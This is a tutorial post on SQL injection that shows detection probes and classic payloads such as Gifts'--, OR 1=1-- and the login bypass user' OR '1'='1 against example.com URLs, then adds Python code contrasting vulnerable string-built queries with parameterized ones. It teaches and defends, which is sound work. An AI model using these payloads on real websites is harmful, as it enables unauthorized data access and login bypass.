Golam_Mostafa

SQL Injection (SQLi)

SQL Injection (SQLi) is an attack against websites that build database queries from user input. By supplying crafted input through forms or URL parameters, an attacker changes the query the site sends to its database and can read or steal data they should never see.


How to Spot SQL Injection

  1. Single Quotes ('): Enter a single quote (') in a form field or URL parameter. If the site returns a database error, it might be vulnerable.
  2. Boolean Conditions: Try entering OR 1=1 (always true) and OR 1=2 (always false) and check whether the site responds differently to each.
  3. Time Delays: Inject a delay function such as SLEEP(5) and check whether the page takes noticeably longer to load.
  4. External Calls: Check whether your input causes the site's server to open a connection to another server.

Example: Finding Hidden Items

Consider a shopping site that lists products with this URL:

https://example.com/products?category=Gifts

The site might use this command to get the products:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1;

The released = 1 condition hides unreleased items, so only products that are ready for sale are shown.

What Hackers Do:

They can change the URL to:

https://example.com/products?category=Gifts'--

This changes the database query to:

SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1;

The -- starts a SQL comment, so the rest of the query (the AND released = 1 condition) is ignored and the database returns all products in the category, including the hidden ones.


Example: Show Everything

Hackers can list every product, including those in other categories, by using:

https://example.com/products?category=Gifts'+OR+1=1--

This creates a query like:

SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1;

Since 1=1 is always true and the released check has been commented out, the database returns every row in the table.


Example: Hacking a Login

Think of a login form that checks username and password. Normally, it might do this:

SELECT * FROM users WHERE username = 'user' AND password = 'pass';

A hacker can enter this as the username:

user' OR '1'='1

The query becomes:

SELECT * FROM users WHERE username = 'user' OR '1'='1' AND password = 'pass';

Since '1'='1' is always true, the query matches a row and the hacker logs in without knowing the password.


Be Careful

Testing SQLi is risky. Commands like OR 1=1 might delete or change important data if misused. Always handle websites and data responsibly.


To stay safe, websites must properly check user inputs and use secure coding practices.
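The following is an added example, not code from the original post or from PortSwigger: the products query from the examples above, built two ways against a constructed in-memory SQLite table. One version splices the category value into the SQL text (the vulnerable pattern behind the Gifts'-- and OR 1=1-- examples); the other binds it as a parameter, which is the secure coding practice that stops the attack. The table contents and function names are my own, and the same fix applies to the login query.

```python
import sqlite3

# Constructed sample catalogue (not from the article): three items in the
# Gifts category, one of them unreleased, plus one item in another category.
SAMPLE_ROWS = [
    (1, "Mug", "Gifts", 1),
    (2, "Card", "Gifts", 1),
    (3, "Secret Gift", "Gifts", 0),  # hidden by the released = 1 condition
    (4, "Lamp", "Home", 1),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER, name TEXT, category TEXT, released INTEGER)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def products_vulnerable(conn, category):
    """The article's query with the user value spliced into the SQL text.

    A value such as Gifts'-- closes the string literal and turns the rest of
    the statement into a comment, so AND released = 1 is never evaluated.
    """
    sql = ("SELECT name FROM products WHERE category = '"
           + category + "' AND released = 1")
    return sorted(row[0] for row in conn.execute(sql))


def products_safe(conn, category):
    """The same query with the value passed as a bound parameter.

    The SQL text is fixed before the value arrives, so a quote or -- inside
    the input is compared as ordinary characters and cannot change the query.
    """
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(row[0] for row in conn.execute(sql, (category,)))


if __name__ == "__main__":
    db = make_db()
    for value in ("Gifts", "Gifts'--", "Gifts' OR 1=1--"):
        print(f"{value!r:20} vulnerable={products_vulnerable(db, value)} "
              f"safe={products_safe(db, value)}")
```

Running it shows the vulnerable function leaking the unreleased item for Gifts'-- and the whole table for Gifts' OR 1=1--, while the parameterized version returns nothing for either, because no category is literally named that.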


Acknowledgment: This document references information from PortSwigger Web Security and ChatGPT.

